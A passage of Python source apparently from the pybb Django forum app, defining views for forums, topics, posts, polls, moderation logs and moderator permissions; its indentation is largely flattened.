from django.views.decorators.http import require_http_methods
from pure_pagination.paginator import Paginator, EmptyPage
from pybb import defaults
from pybb.compat import get_user_model
from pybb.models import (Forum, Topic, Post, Moderator, LogModeration, Attachment, Poll,
TopicReadTracker, ForumReadTracker, PollAnswerUser, Subscription)
from pybb.models.mixins import prefetch_parent_forums
from pybb.util import load_class, generic, queryset_to_dict, redirect_to_login
from pybb.models.base import markup
from pybb.forms import (PostForm, AdminPostForm, PostsMoveExistingTopicForm,
PollAnswerFormSet, AttachmentFormSet, PollForm,
ForumForm, ModerationForm, SearchUserForm,
get_topic_move_formset, get_topic_merge_formset,
get_topic_delete_formset, PostsMoveNewTopicForm)
from pybb.templatetags.pybb_tags import pybb_topic_poll_not_voted
from pybb.helpers import load_user_posts
login_required = load_class(defaults.PYBB_LOGIN_REQUIRED_DECORATOR)
def filter_hidden(request, queryset_or_model):
"""
Return queryset for model, manager or queryset,
filtering hidden objects for non authenticated users and staff users.
"""
queryset = _get_queryset(queryset_or_model)
return queryset.filter_by_user(request.user)
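# Sketch: any model or queryset whose manager implements `filter_by_user` can
# be narrowed per-request, e.g.
#
#     visible_forums = filter_hidden(request, Forum)
#     visible_topics = filter_hidden(request, forum.topics.all())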
class ListView(generic.ListView):
prefetch_fields = None
prefetch_profiles = None
prefetch_parent_forums = None
allow_empty_page = False
forum_cache = {}
def paginate_queryset(self, queryset, page_size):
try:
paginator, page, queryset, is_paginated = super(ListView, self).paginate_queryset(queryset, page_size)
except EmptyPage:
if self.allow_empty_page:
return None, None, None, False
raise Http404(ugettext('Page is empty.'))
else:
if self.prefetch_fields:
queryset = queryset.prefetch_related(*self.prefetch_fields)
if self.prefetch_profiles:
queryset = queryset.prefetch_profiles(*self.prefetch_profiles)
if self.prefetch_parent_forums is not None:
queryset = prefetch_parent_forums(queryset, forum_cache_by_id=self.forum_cache, through=self.prefetch_parent_forums)
return paginator, page, queryset, is_paginated
class IndexView(ListView):
template_name = 'pybb/index.html'
context_object_name = 'forums'
allow_empty_page = True
def get_context_data(self, **kwargs):
ctx = super(IndexView, self).get_context_data(**kwargs)
forums = queryset_to_dict(filter_hidden(self.request, Forum.objects.filter(forum__isnull=True)))
for forum in ctx['forums']:
if forum.forum_id in forums:
parent_forum = forums[forum.forum_id]
if not hasattr(parent_forum, 'forums_accessed'):
parent_forum.forums_accessed = []
parent_forum.forums_accessed.append(forum)
ctx['forums'] = sorted(forums.values(), key=lambda forum: forum.position)
return ctx
def get_queryset(self):
qs = filter_hidden(self.request, (Forum.objects.filter(forum__forum__isnull=True, forum__isnull=False)
.select_related('last_post__topic__forum',
'last_post__user')
.order_by('forum', 'position')))
return qs
class ForumCreateView(generic.CreateView):
form_class = ForumForm
template_name = 'pybb/forum/create.html'
model = Forum
context_object_name = 'forum'
def get_initial(self):
initial = super(ForumCreateView, self).get_initial()
if hasattr(self, 'parent_forum'):
initial['forum'] = self.parent_forum
return initial
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
parent_forum_id = self.kwargs.pop('forum_id', None)
if parent_forum_id:
self.parent_forum = get_object_or_404(Forum.objects.all(), pk=parent_forum_id)
self.parent_forum.prefetch_parent_forums()
return super(ForumCreateView, self).dispatch(request, *args, **kwargs)
class ForumUpdateView(generic.UpdateView):
form_class = ForumForm
model = Forum
template_name = 'pybb/forum/update.html'
pk_url_kwarg = 'pk'
def get_object(self, queryset=None):
obj = super(ForumUpdateView, self).get_object(queryset=queryset)
obj.prefetch_parent_forums()
return obj
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(ForumUpdateView, self).dispatch(request, *args, **kwargs)
class BaseForumDetailView(ListView):
paginator_class = Paginator
paginate_by = defaults.PYBB_FORUM_PAGE_SIZE
model = Topic
def get(self, request, *args, **kwargs):
forum = self.get_forum()
if forum.is_hidden() and not self.request.user.is_authenticated:
return redirect_to_login(request.build_absolute_uri())
if 'page' in kwargs:
page = kwargs.get('page', None)
if page:
page = int(page)
if page == 1:
return redirect(forum.get_absolute_url(), permanent=True)
self.object_list = self.get_queryset()
allow_empty = self.get_allow_empty()
if not allow_empty and len(self.object_list) == 0:
raise Http404(_(u"Empty list and '%(class_name)s.allow_empty' is False.")
% {'class_name': self.__class__.__name__})
context = self.get_context_data(object_list=self.object_list)
return self.render_to_response(context)
class ForumDetailView(BaseForumDetailView):
context_object_name = 'topic_list'
prefetch_fields = ('user', 'last_post', 'last_post__user')
prefetch_profiles = ('user', 'last_post__user')
prefetch_parent_forums = ()
template_name = 'pybb/forum/detail.html'
    url = r'^(?P<slug>[\w\-\_]+)/(?:(?P<page>\d+)/)?$'
def get_context_data(self, **kwargs):
ctx = super(ForumDetailView, self).get_context_data(**kwargs)
ctx['forum'] = self.forum
qs = filter_hidden(self.request,
self.forum.forums.select_related('last_post__topic__forum',
'last_post__user'))
self.forum.forums_accessed = qs
for topic in ctx[self.context_object_name]:
topic.forum = self.forum
return ctx
def get_queryset(self):
if not self.forum.is_accessible_by(self.request.user, hidden=False):
raise Http404
qs = (self.forum.topics.order_by('-sticky', '-updated')
.filter_by_user(self.request.user, forum=self.forum))
return qs
def get_forum(self):
self.forum = get_object_or_404(Forum.objects.filter_by_user(self.request.user, hidden=False),
slug=self.kwargs['slug'])
self.forum.prefetch_parent_forums()
return self.forum
class LogModerationListView(ListView):
template_name = 'pybb/moderation/logs.html'
paginate_by = defaults.PYBB_FORUM_PAGE_SIZE
context_object_name = 'logmoderation_list'
paginator_class = Paginator
model = LogModeration
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(LogModerationListView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
return self.model.objects.select_related()
class TopicsLatestView(ListView):
paginator_class = Paginator
paginate_by = defaults.PYBB_TOPIC_PAGE_SIZE
model = Topic
context_object_name = 'topic_list'
prefetch_fields = ('user', 'last_post', 'last_post__user')
prefetch_profiles = ('user', 'last_post__user')
template_name = 'pybb/topic/latest.html'
def get_queryset(self):
return (self.model.objects.visible()
.select_related('forum')
.order_by('-updated'))
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(TopicsLatestView, self).dispatch(request, *args, **kwargs)
class UserPostsView(ListView):
paginate_by = defaults.PYBB_TOPIC_PAGE_SIZE
paginator_class = Paginator
context_object_name = 'post_list'
template_name = 'pybb/user/post_list.html'
prefetch_fields = ('topic', 'topic__user', 'attachments')
prefetch_profiles = ('topic__user',)
def get_queryset(self):
self.user = get_object_or_404(get_user_model(),
username=self.kwargs['username'])
qs = (self.user.posts.all()
.visible(join=False)
.order_by('-created'))
return qs
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(UserPostsView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
ctx = super(UserPostsView, self).get_context_data(**kwargs)
ctx['post_user'] = self.user
load_user_posts(ctx[self.context_object_name], self.user)
return ctx
class UserPostsDeleteView(generic.DeleteView):
template_name = 'pybb/user/posts_delete.html'
context_object_name = 'post_user'
slug_url_kwarg = 'username'
slug_field = 'username'
prefetch_fields = ('topic', 'topic__user', 'attachments')
prefetch_profiles = ('topic__user',)
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(UserPostsDeleteView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
return get_user_model().objects.all()
def get_context_data(self, **kwargs):
context = super(UserPostsDeleteView, self).get_context_data(**kwargs)
posts = (self.object.posts
.visible(join=False)
.order_by('-created')[:10]
.prefetch_related(*self.prefetch_fields)
.prefetch_profiles(*self.prefetch_profiles))
load_user_posts(posts, self.object)
context['post_list'] = posts
context['count'] = self.object.posts.visible().count()
return context
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
self.object.posts.all().update(deleted=True)
for topic in Topic.objects.filter(first_post__user=self.object):
topic.mark_as_deleted()
        messages.success(self.request, _('All messages from %(user)s have been deleted') % {
'user': self.object
})
return redirect(self.get_success_url())
def get_success_url(self):
return reverse('pybb:user_posts', kwargs={
'username': self.object.username
})
class TopicDetailView(ListView):
paginate_by = defaults.PYBB_TOPIC_PAGE_SIZE
paginator_class = Paginator
context_object_name = 'post_list'
template_name = 'pybb/topic/list.html'
prefetch_fields = ('user', 'attachments')
prefetch_profiles = ('user',)
    url = r'^(?P<forum_slug>[\w\-]+)/(?P<pk>\d+)-(?P<slug>[\w\-]+)(?:-(?P<page>\d+)/)?$'
def get(self, request, *args, **kwargs):
topic = self.get_topic()
if topic.is_hidden() and not self.request.user.is_authenticated:
return redirect_to_login(request.build_absolute_uri())
self.object_list = self.get_queryset()
allow_empty = self.get_allow_empty()
if not allow_empty and len(self.object_list) == 0:
raise Http404(_(u"Empty list and '%(class_name)s.allow_empty' is False.")
% {'class_name': self.__class__.__name__})
context = self.get_context_data(object_list=self.object_list)
if (topic.slug != self.kwargs['slug'] or
('forum_slug' in self.kwargs and topic.forum.slug != self.kwargs['forum_slug'])):
return redirect(topic.get_absolute_url(), permanent=True)
if topic.redirect:
redirection = topic.redirection
to_url = redirection.to_topic.get_absolute_url()
if redirection.is_type_permanent():
return redirect(to_url, permanent=True)
elif redirection.is_type_expiring():
if redirection.is_expired():
raise Http404
return redirect(to_url)
elif redirection.is_type_no():
raise Http404
page = kwargs.get('page', None)
if page:
page = int(page)
if page == 1:
return redirect(topic.get_absolute_url(), permanent=True)
topic.views += 1
Topic.objects.filter(pk=topic.pk).update(views=topic.views)
return self.render_to_response(context)
def get_topic(self):
self.topic = get_object_or_404(Topic.objects.all().select_related('forum'),
pk=self.kwargs['pk'])
return self.topic
def get_queryset(self):
if not self.topic.is_accessible_by(self.request.user):
raise Http404
qs = (self.topic.posts.all()
.filter_by_user(self.topic, self.request.user)
.order_by('created'))
return qs
def get_context_data(self, **kwargs):
ctx = super(TopicDetailView, self).get_context_data(**kwargs)
self.topic.post_counts = {
self.request.user: ctx['paginator'].count
}
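        # Translate the page number into the 1-based index of the first post
        # on this page, so each post can be numbered relative to the whole
        # topic rather than to the current page.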
page_number = ctx['page_obj'].number
start = page_number
if page_number > 1:
start = (start - 1) * ctx['paginator'].per_page + 1
for idx, post in enumerate(ctx[self.context_object_name], start):
post.topic = self.topic
post.index = idx
ctx['topic'] = self.topic
ctx['subscription_types'] = Subscription.TYPE_CHOICES
ctx['redirect'] = self.request.GET.get('redirect', False)
if self.request.user.is_authenticated:
self.request.user.is_moderator = self.topic.is_moderated_by(self.request.user)
self.request.user.is_subscribed = self.topic.is_subscribed_by(self.request.user)
self.topic.mark_as_read(self.request.user)
if (self.topic.poll_id and
pybb_topic_poll_not_voted(self.topic.poll, self.request.user)):
try:
ctx['poll_form'] = PollForm(self.topic.poll)
except Poll.DoesNotExist:
pass
try:
subscription = self.request.user.subscription_set.get(topic=self.topic)
ctx['current_subscription_type'] = ctx['subscription_types'][subscription.type]
except Subscription.DoesNotExist:
ctx['current_subscription_type'] = Subscription.TYPE_CHOICES[0]
if defaults.PYBB_FREEZE_FIRST_POST:
ctx['first_post'] = self.topic.head
else:
ctx['first_post'] = None
return ctx
class PostUpdateMixin(object):
def get_form_class(self):
if self.request.user.is_staff or self.request.user.is_superuser:
return AdminPostForm
return PostForm
def get_context_data(self, **kwargs):
ctx = super(PostUpdateMixin, self).get_context_data(**kwargs)
instance = None
        if getattr(self, 'object', None):
instance = self.object.topic.poll
if 'pollformset' not in kwargs:
pollformset = PollAnswerFormSet(instance=instance)
ctx['pollformset'] = pollformset
return ctx
def get_form_kwargs(self):
form_kwargs = super(PostUpdateMixin, self).get_form_kwargs()
if self.request.user.is_staff and self.object:
form_kwargs['initial']['login'] = self.object.user
return form_kwargs
def form_valid(self, form):
success = True
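        # Compatibility shim: prefer transaction.atomic() (Django >= 1.6) and
        # fall back to commit_manually() on older versions. The savepoint lets
        # us discard the saved post if the attached poll formset is invalid.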
with getattr(transaction, 'atomic', getattr(transaction, 'commit_manually', None))():
sid = transaction.savepoint()
try:
self.object = form.save()
if self.object.topic.poll:
if self.object.topic.head == self.object:
pollformset = PollAnswerFormSet(self.request.POST,
instance=self.object.topic.poll)
if pollformset.is_valid():
pollformset.save()
else:
success = False
else:
success = True
if success:
transaction.savepoint_commit(sid)
else:
transaction.savepoint_rollback(sid)
            except Exception:
                transaction.savepoint_rollback(sid)
                raise
if success:
return super(ModelFormMixin, self).form_valid(form)
context = self.get_context_data(form=form,
pollformset=pollformset)
return self.render_to_response(context)
class BasePostCreateView(PostUpdateMixin, generic.CreateView):
template_name = 'pybb/post/create.html'
def get_form_kwargs(self):
ip = self.request.META.get('REMOTE_ADDR', '')
form_kwargs = super(BasePostCreateView, self).get_form_kwargs()
form_kwargs.update(dict(topic=self.topic, forum=self.forum, user=self.user,
ip=ip, initial={}))
if self.user.is_staff:
form_kwargs['initial']['login'] = self.user
return form_kwargs
def get_context_data(self, **kwargs):
ctx = super(BasePostCreateView, self).get_context_data(**kwargs)
ctx['forum'] = self.forum
ctx['topic'] = self.topic
return ctx
def get_success_url(self):
if (not self.request.user.is_authenticated and
defaults.PYBB_PREMODERATION):
return reverse('pybb:index')
return self.object.get_anchor_url(self.request.user)
def get_parents(self, request, *args, **kwargs):
self.forum = None
self.topic = None
data = request.POST or {}
forum_id = kwargs.get('forum_id', None) or data.get('forum_id', None)
topic_id = kwargs.get('topic_id', None) or data.get('topic_id', None)
if forum_id:
self.forum = get_object_or_404(filter_hidden(request, Forum), pk=forum_id)
self.forum.prefetch_parent_forums()
elif topic_id:
self.topic = get_object_or_404(Topic.objects.visible(), pk=topic_id)
self.topic.prefetch_parent_forums()
if not self.topic.is_accessible_by(request.user):
raise Http404
if self.topic.closed:
raise PermissionDenied
@method_decorator(csrf_protect)
def dispatch(self, request, *args, **kwargs):
if request.user.is_authenticated:
self.user = request.user
else:
if not defaults.PYBB_ENABLE_ANONYMOUS_POST:
return redirect_to_login(request.build_absolute_uri())
User = get_user_model()
self.user, new = User.objects.get_or_create(username=defaults.PYBB_ANONYMOUS_USERNAME)
self.get_parents(request, *args, **kwargs)
result = all([load_class(pre_post_create_filter)(
topic=self.topic,
request=request,
forum=self.forum,
).is_allowed(request.user) for pre_post_create_filter in defaults.PYBB_PRE_POST_CREATE_FILTERS])
if not result:
raise PermissionDenied
return super(BasePostCreateView, self).dispatch(request, *args, **kwargs)
class PostCreateView(BasePostCreateView):
def get_context_data(self, **kwargs):
ctx = super(PostCreateView, self).get_context_data(**kwargs)
ctx['post_list'] = []
if self.topic:
qs = (self.topic.posts.all()
.select_related('user')
.order_by('-created')
.filter_by_user(self.topic, self.request.user))
ctx['post_count'] = qs.count()
posts = qs[:defaults.PYBB_POST_LIST_SIZE]
for post in posts:
post.topic = self.topic
ctx['post_list'] = posts
ctx['post_page_size'] = defaults.PYBB_POST_LIST_SIZE
return ctx
class PostUpdateView(PostUpdateMixin, generic.UpdateView):
model = Post
context_object_name = 'post'
template_name = 'pybb/post/update.html'
def get_form_kwargs(self):
form_kwargs = super(PostUpdateView, self).get_form_kwargs()
form_kwargs.update(dict(actor=self.request.user))
return form_kwargs
@method_decorator(login_required)
@method_decorator(csrf_protect)
def dispatch(self, request, *args, **kwargs):
return super(PostUpdateView, self).dispatch(request, *args, **kwargs)
def get_object(self, queryset=None):
post = super(PostUpdateView, self).get_object(queryset)
if not post.is_editable_by(self.request.user, 'can_change_post'):
raise PermissionDenied
return post
def get_success_url(self, *args, **kwargs):
if self.request.user.pk != self.object.user_id:
LogModeration.objects.log(
user=self.request.user,
obj=self.object,
action_flag=LogModeration.ACTION_FLAG_CHANGE,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_MEDIUM,
)
return super(PostUpdateView, self).get_success_url(*args, **kwargs)
class PostsCreateView(generic.RedirectView):
http_method_names = ['post']
permanent = True
def get_redirect_url(self, **kwargs):
if 'topic_id' not in self.request.POST:
raise Http404
try:
pk = int(self.request.POST.get('topic_id', None))
except ValueError:
raise Http404
return reverse('pybb:post_create', kwargs={
'topic_id': pk
})
class PostRedirectView(generic.RedirectView):
http_method_names = ['post', 'get']
permanent = True
def get_redirect_url(self, **kwargs):
if self.request.method == 'POST':
if 'post_id' not in self.request.POST:
raise Http404
try:
pk = int(self.request.POST.get('post_id', None))
except ValueError:
raise Http404
else:
pk = kwargs.get('post_id', None)
if not pk:
raise Http404
post = get_object_or_404(Post, pk=pk)
if not post.is_accessible_by(self.request.user):
raise PermissionDenied
return post.get_anchor_url(self.request.user, {'redirect': 1})
class PostModerateView(generic.RedirectView):
permanent = False
def get_redirect_url(self, **kwargs):
post = get_object_or_404(Post, pk=self.kwargs['pk'])
if not post.topic.is_moderated_by(self.request.user):
raise PermissionDenied
post.on_moderation = not post.on_moderation
post.save()
if post.on_moderation:
change_message = _('%s is now on moderation') % post
else:
change_message = _('%s is not on moderation anymore') % post
LogModeration.objects.log(
user=self.request.user,
obj=post,
action_flag=LogModeration.ACTION_FLAG_CHANGE,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_MEDIUM,
change_message=change_message
)
return post.get_anchor_url(self.request.user)
class PostDeleteView(generic.DeleteView):
template_name = 'pybb/post/delete.html'
context_object_name = 'post'
def get_object(self, queryset=None):
post = get_object_or_404(Post.objects.select_related('topic', 'topic__forum'),
pk=self.kwargs['pk'])
self.topic = post.topic
self.forum = post.topic.forum
if (not self.topic.is_moderated_by(self.request.user, 'can_delete_post') and
not post.user == self.request.user):
raise PermissionDenied
return post
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
if not self.object.deleted:
self.object.mark_as_deleted(user=self.request.user)
else:
self.object.mark_as_undeleted()
return redirect(self.get_success_url())
def get_success_url(self):
if self.object.deleted:
messages.success(self.request, _('Your post has been successfully deleted'))
else:
messages.success(self.request, _('Your post has been successfully restored'))
if self.request.user.pk != self.object.user_id:
LogModeration.objects.log(
user=self.request.user,
obj=self.object,
action_flag=LogModeration.ACTION_FLAG_DELETION,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_HIGH,
)
try:
Topic.objects.filter(deleted=False).get(pk=self.topic.id)
except Topic.DoesNotExist:
return self.forum.get_absolute_url()
else:
return self.topic.get_absolute_url()
class PostsMoveView(generic.FormView):
http_method_names = ['post']
choice = {
'0': ('new_topic_form', PostsMoveNewTopicForm),
'1': ('existing_topic_form', PostsMoveExistingTopicForm),
}
template_name = 'pybb/post/move.html'
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(PostsMoveView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
return kwargs
def post(self, request, *args, **kwargs):
forms = {}
context = {}
post_ids = self.request.POST.getlist('post_ids')
context['post_ids'] = post_ids
posts = (Post.objects.filter(pk__in=post_ids)
.select_related('topic', 'topic__forum'))
context['posts'] = posts
if not len(posts):
raise Http404
for post in posts:
if (not post.topic.is_moderated_by(self.request.user, 'can_move_post')):
raise PermissionDenied
for key, (form_name, form_class) in self.choice.items():
form = form_class(request.POST if 'submit' in request.POST else None,
posts=posts, user=request.user)
forms[key] = form
context[form_name] = form
if 'submit' in request.POST:
choice = request.POST.get('choice', '0')
if choice in forms:
form = forms[choice]
if form.is_valid():
topic = form.save()
return redirect(topic.get_absolute_url())
return self.render_to_response(context)
class TopicBatchView(generic.FormView):
http_method_names = ['post']
def get_context_data(self, **kwargs):
return dict(super(TopicBatchView, self).get_context_data(**kwargs), **{
'topic_ids': self.request.POST.getlist('topic_ids')
})
def get_initial(self):
return {}
def get_queryset(self):
return Topic.objects.visible().filter(pk__in=self.request.POST.getlist('topic_ids'))
def get_form_class(self):
topics = self.get_queryset()
if not len(topics):
raise Http404
for topic in topics:
if (not topic.is_moderated_by(self.request.user, self.permission_name)):
raise PermissionDenied
return self.get_formset_class(topics=topics)
def get_formset_class(self, **kwargs):
pass
def get_form_kwargs(self):
"""
        Returns the keyword arguments for instantiating the form.
"""
kwargs = {'initial': self.get_initial()}
if self.request.method in ('POST', 'PUT') and 'submit' in self.request.POST:
kwargs.update({
'data': self.request.POST,
'files': self.request.FILES,
})
return kwargs
def post(self, request, *args, **kwargs):
form_class = self.get_form_class()
form = self.get_form(form_class)
if 'submit' in request.POST:
if form.is_valid():
return self.form_valid(form)
return self.form_invalid(form)
return self.render_to_response(self.get_context_data(form=form))
def form_valid(self, formset):
topics = []
for form in formset:
topics.append((form.topic, form.save()))
return redirect(self.get_success_url(topics))
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(TopicBatchView, self).dispatch(request, *args, **kwargs)
def get_success_url(self, topics):
return reverse('pybb:index')
class TopicMergeView(TopicBatchView):
template_name = 'pybb/topic/merge.html'
permission_name = 'can_merge_topic'
def get_formset_class(self, **kwargs):
return get_topic_merge_formset(**kwargs)
def get_success_url(self, topics):
for old_topic, new_topic in topics:
            messages.success(self.request, _('<a href="%(old_topic_url)s">%(old_topic)s</a> has been successfully merged into <a href="%(new_topic_url)s">%(new_topic)s</a>') % {
'old_topic_url': old_topic.get_absolute_url(),
'old_topic': old_topic,
'new_topic_url': new_topic.get_absolute_url(),
'new_topic': new_topic
})
return reverse('pybb:index')
class TopicMoveView(TopicBatchView):
template_name = 'pybb/topic/move.html'
permission_name = 'can_move_topic'
def get_formset_class(self, **kwargs):
return get_topic_move_formset(**kwargs)
def get_success_url(self, topics):
for old_topic, new_topic in topics:
messages.success(self.request, _('<a href="%(old_topic_url)s">%(old_topic)s</a> successfully moved to <a href="%(new_topic_url)s">%(new_topic)s</a>') % {
'old_topic_url': old_topic.get_absolute_url(),
'old_topic': old_topic,
'new_topic_url': new_topic.get_absolute_url(),
'new_topic': new_topic
})
return reverse('pybb:index')
class TopicsDeleteView(TopicBatchView):
template_name = 'pybb/topic/delete.html'
permission_name = 'can_delete_topic'
def get_queryset(self):
return Topic.objects.filter(pk__in=self.request.POST.getlist('topic_ids'))
def get_context_data(self, **kwargs):
context = dict(super(TopicBatchView, self).get_context_data(**kwargs), **{
'topic_ids': self.request.POST.getlist('topic_ids'),
})
formset = context['form']
topics = defaultdict(list)
for form in formset.forms:
if form.topic.deleted:
topics['to_restore'].append(form)
else:
topics['to_delete'].append(form)
context['topics'] = dict(topics)
return context
def get_formset_class(self, **kwargs):
return get_topic_delete_formset(**kwargs)
def form_valid(self, formset):
topics = []
for form in formset:
topics.append(form.save())
return redirect(self.get_success_url(topics))
def get_success_url(self, topics):
sorted_topics = defaultdict(list)
for topic in topics:
if topic.deleted:
sorted_topics['deleted'].append(topic)
else:
sorted_topics['restored'].append(topic)
actions = {
'deleted': _('deleted'),
'restored': _('restored'),
}
for key in ('deleted', 'restored', ):
if key in sorted_topics:
messages.success(self.request, _('%(topics)s successfully %(action)s') % {
'topics': ' '.join(['<a href="%(topic_url)s">%(topic)s</a>' % {
'topic_url': topic.get_absolute_url(),
'topic': topic
} for topic in sorted_topics[key]]),
'action': actions[key]
})
return reverse('pybb:index')
class TopicDeleteView(generic.DeleteView):
template_name = 'pybb/topic/delete.html'
context_object_name = 'topic'
def get_object(self, queryset=None):
topic = get_object_or_404(Topic.objects.select_related('forum'),
pk=self.kwargs['pk'])
self.topic = topic
self.forum = topic.forum
if not self.topic.is_moderated_by(self.request.user, 'can_delete_topic'):
raise PermissionDenied
return topic
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
if not self.object.deleted:
self.object.mark_as_deleted()
else:
self.object.mark_as_undeleted()
return redirect(self.get_success_url())
def get_success_url(self):
if self.object.deleted:
LogModeration.objects.log(
user=self.request.user,
obj=self.object,
action_flag=LogModeration.ACTION_FLAG_DELETION,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_HIGH,
)
return self.forum.get_absolute_url()
class TopicActionBaseView(generic.View):
def get_topic(self):
topic = get_object_or_404(Topic, pk=self.kwargs['pk'])
if not self.is_allowed(topic, self.request.user):
raise PermissionDenied
return topic
def is_allowed(self, topic, user, permission=None):
return topic.is_moderated_by(user, permission=permission)
@method_decorator(login_required)
def get(self, *args, **kwargs):
self.topic = self.get_topic()
self.action(self.topic)
LogModeration.objects.log(
user=self.request.user,
obj=self.topic,
action_flag=LogModeration.ACTION_FLAG_CHANGE,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_HIGH,
change_message=self.get_change_message(self.topic)
)
return redirect(self.topic.get_absolute_url())
def get_change_message(self, topic):
return ''
class TopicStickView(TopicActionBaseView):
def action(self, topic):
topic.sticky = True
topic.save()
def is_allowed(self, topic, user):
return super(TopicStickView, self).is_allowed(topic, user, 'can_stick_topic')
def get_change_message(self, topic):
return _('Stick topic %s') % topic.name
class TopicUnstickView(TopicActionBaseView):
def action(self, topic):
topic.sticky = False
topic.save()
def is_allowed(self, topic, user):
return super(TopicUnstickView, self).is_allowed(topic, user, 'can_unstick_topic')
def get_change_message(self, topic):
return _('Unstick topic %s') % topic.name
class TopicCloseView(TopicActionBaseView):
def action(self, topic):
topic.closed = True
topic.save()
def is_allowed(self, topic, user):
return super(TopicCloseView, self).is_allowed(topic, user, 'can_close_topic')
def get_change_message(self, topic):
return _('Close topic %s') % topic.name
class TopicTrackerRedirectView(generic.RedirectView):
http_method_names = ['get']
permanent = True
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(TopicTrackerRedirectView, self).dispatch(request, *args, **kwargs)
def get_redirect_url(self, **kwargs):
topic = get_object_or_404(Topic, pk=kwargs.get('topic_id'))
tracker = None
try:
tracker = TopicReadTracker.objects.get(topic=topic, user=self.request.user)
except TopicReadTracker.DoesNotExist:
try:
tracker = ForumReadTracker.objects.get(forum=topic.forum, user=self.request.user)
except ForumReadTracker.DoesNotExist:
pass
if not tracker:
return topic.get_absolute_url()
try:
post = topic.posts.visible().filter(created__gte=tracker.time_stamp).order_by('created')[0]
except IndexError:
try:
return topic.last_post.get_absolute_url()
except Post.DoesNotExist:
return topic.get_absolute_url()
else:
return post.get_anchor_url(user=self.request.user)
class TopicOpenView(TopicActionBaseView):
def action(self, topic):
topic.closed = False
topic.save()
def is_allowed(self, topic, user):
return super(TopicOpenView, self).is_allowed(topic, user, 'can_open_topic')
def get_change_message(self, topic):
return _('Open topic %s') % topic.name
class TopicPollVoteView(generic.UpdateView):
queryset = Topic.objects.visible().filter(poll__isnull=False).select_related('poll')
http_method_names = ['post', ]
form_class = PollForm
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(TopicPollVoteView, self).dispatch(request, *args, **kwargs)
def get_form_kwargs(self):
kwargs = super(ModelFormMixin, self).get_form_kwargs()
kwargs['poll'] = self.object.poll
return kwargs
def form_valid(self, form):
# already voted
if not pybb_topic_poll_not_voted(self.object.poll, self.request.user):
return HttpResponseBadRequest()
answers = form.cleaned_data['answers']
for answer in answers:
# poll answer from another topic
if answer.poll != self.object.poll:
return HttpResponseBadRequest()
PollAnswerUser.objects.create(poll_answer=answer,
user=self.request.user)
return super(ModelFormMixin, self).form_valid(form)
    def form_invalid(self, form):
        return redirect(self.object.get_absolute_url())
def get_success_url(self):
return self.object.get_absolute_url()
class ModeratorListView(ListView):
paginate_by = defaults.PYBB_TOPIC_PAGE_SIZE
paginator_class = Paginator
template_name = 'pybb/moderation/moderator/list.html'
context_object_name = 'moderator_list'
model = Moderator
allow_empty_page = True
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(ModeratorListView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
return dict(super(ModeratorListView, self).get_context_data(**kwargs), **{
'object': self.object
})
def get_object(self):
self.object = get_object_or_404(Forum, pk=self.kwargs.get('pk'))
return self.object
def get_queryset(self):
return self.model.objects.filter(forum=self.get_object())
class ModeratorDetailView(generic.DetailView, FormMixin):
template_name = 'pybb/moderation/moderator/detail.html'
model = Moderator
pk_url_kwarg = 'moderator_id'
context_object_name = 'moderator'
form_class = ModerationForm
@method_decorator(staff_member_required)
def dispatch(self, request, *args, **kwargs):
return super(ModeratorDetailView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
self.forum = get_object_or_404(Forum, pk=self.kwargs.get('forum_id'))
return self.model.objects.filter(forum=self.forum)
def get_context_data(self, **kwargs):
return dict(super(ModeratorDetailView, self).get_context_data(**kwargs), **{
'forum': self.forum,
'forms': self.get_forms(self.get_form_class()),
})
def get_forms(self, form_class):
return [form_class(permissions=self.get_permissions(defaults.PYBB_FORUM_PERMISSIONS, Forum),
obj=self.forum,
user=self.object.user,
**self.get_form_kwargs()),
form_class(permissions=self.get_permissions(defaults.PYBB_USER_PERMISSIONS),
user=self.object.user,
**self.get_form_kwargs())]
def post(self, request, *args, **kwargs):
self.object = self.get_object()
context = self.get_context_data(object=self.object)
forms = context['forms']
if all([form.is_valid() for form in forms]):
return self.form_valid(forms)
return self.form_invalid(forms)
def form_valid(self, forms):
for form in forms:
form.save(self.object.user)
return redirect(self.get_success_url())
def get_permissions(self, codenames, model_class=None):
filters = {
'codename__in': codenames
}
if model_class:
filters['content_type'] = ContentType.objects.get_for_model(model_class)
return Permission.objects.filter(**filters)
def get_success_url(self):
names = [permission.name
for permission in self.object.user.user_permissions.all()]
change_message = _('Changed permissions:\n %s') % '\n'.join(names)
LogModeration.objects.log(
user=self.request.user,
obj=self.forum,
action_flag=LogModeration.ACTION_FLAG_CHANGE,
target=self.object.user,
user_ip=self.request.META['REMOTE_ADDR'],
level=LogModeration.LEVEL_MEDIUM,
change_message=change_message
)
messages.success(self.request, _('Permissions for moderator "%(username)s" successfully saved') % {
'username': self.object.user.username
})
return reverse('pybb:moderator_detail', kwargs={
'forum_id': self.forum.pk,
'moderator_id': self.object.pk
})
class ModeratorCreateView(ModeratorDetailView):
template_name = 'pybb/moderation/moderator/create.html'
model = Forum
pk_url_kwarg = 'forum_id'
context_object_name = 'forum'
